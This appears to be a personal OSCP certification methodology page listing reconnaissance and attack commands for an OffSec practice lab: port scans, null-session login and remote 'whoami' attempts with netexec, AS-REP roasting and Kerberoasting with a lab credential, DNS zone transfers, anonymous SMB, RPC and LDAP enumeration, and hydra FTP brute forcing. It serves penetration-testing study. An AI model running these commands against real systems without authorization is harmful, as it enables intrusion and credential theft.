OSCP Methodologie

Enumeration

IP=$ip
mkdir nmap
sudo nmap -sS $IP -sV -sC -Pn -n --open | tee -a nmap/nmap-default-script.md
sudo nmap -sS $IP -p- -T5 --min-rate 2000 -Pn -n --open | tee -a nmap/nmap-full-ports.md
rustscan -a $IP | tee -a nmap/rustscan
sudo autorecon $IP
# UDP
sudo nmap -Pn -n $IP -sU --top-ports=100

netexec rdp   $ip -u '' -p '' -x whoami
netexec wmi   $ip -u '' -p '' -x whoami
netexec smb   $ip -u '' -p '' -x whoami
netexec ldap  $ip -u '' -p ''
netexec ftp   $ip -u '' -p ''
netexec vnc   $ip -u '' -p ''
netexec winrm $ip -u '' -p '' -x whoami
netexec ssh   $ip -u '' -p '' -x whoami
netexec nfs   $ip -u '' -p ''
netexec mssql $ip -u '' -p '' -x whoami

netexec smb   $ip -u '' -p '' --shares

# AS-REP Roasting
impacket-GetNPUsers -dc-ip $ip -request hutch.offsec/fmcsorley:'CrabSharkJellyfish192'
# Kerberoasting
impacket-GetUserSPNs -dc-ip $ip -request hutch.offsec/fmcsorley:'CrabSharkJellyfish192'

SMB 139,445

# SMB Shares
smbclient -L ////$ip   -U '' --password=''
smbmap -H $ip

# Enum4Linux
enum4linux-ng -R -d -A $ip
enum4linux -a $ip

WEB

sudo gobuster dir -w '/usr/share/wordlists/common_big.txt' -u http://$IP -t 42 -b 404,403,400
# wordlist 
/usr/share/wordlists/common_big_directory-list-2.3-medium.txt
- Subdomains ?

DNS 53

# DNS Zone Transfert
dig axfr $domain @$ip
dig @$IP axfr hutch.offsec

RPC

rpcclient -U "" -N $ip -c "srvinfo"
rpcclient -U "" -N $ip -c "enumdomusers"
rpcclient -U "" -N $ip -c "querydominfo"

RDP 3389

# Occasionally we can see usernames
rdesktop $ip

LDAP

ldapsearch -H ldap://$IP -x -s base namingcontexts
ldapsearch -H ldap://$IP -x -b"DC=hutch,DC=offsec"
ldapsearch -x -H ldap://$ip -D '' -w '' -b "DC=hutch,DC=offsec"
ldapsearch -H ldap://$ip -x -s base -b '' "(objectClass=*)" "*" +
nxc ldap $ip -u '' -p '' --query "(sAMAccountName=*)" ""

FTP 21

- Default Creds
- upload/download files
wget -r ftp://Anonymous:pass@$IP
sudo hydra -L names.txt -P '/usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt' -s 21 ftp://$IP

Flag

dir /s/b local.txt
dir /s/b proof.txt

PreviousOSCP Page NextEXTERNAL PENTEST

Last updated 4 days ago

hashtagEnumeration

Enumeration